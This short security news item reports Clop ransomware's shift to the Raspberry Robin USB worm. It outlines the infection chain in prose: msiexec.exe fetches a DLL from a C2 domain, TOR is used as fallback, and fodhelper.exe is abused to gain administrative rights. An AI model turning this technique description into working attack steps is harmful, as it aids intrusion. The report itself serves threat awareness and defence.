According to researchers at Microsoft, they have seen an uptick in Clop ransomware infections. The group has made a tactic switch and begun using Raspberry Robin as their main form of Infection, whereas previously, the group relied on phishing campaigns to steal credentials and gain access into organizations. Raspberry Robin is a Windows worm and propagated through removable USB drives. The malicious code uses Windows Installer to reach out to QNAP-associated domains and download a malicious DLL. The malware uses TOR exit nodes as a backup C2 infrastructure. The malware uses cmd.exe to read and execute a file stored on the infected external drive, it leverages msiexec.exe for external network communication to a rogue domain used as C2 to download and install a DLL library file. Then msiexec.exe launches a legitimate Windows utility, fodhelper.exe, which will run rundll32.exe to execute a malicious command. Researchers pointed out that processes launched by fodhelper.exe run with administrative privileges and require no user account commands.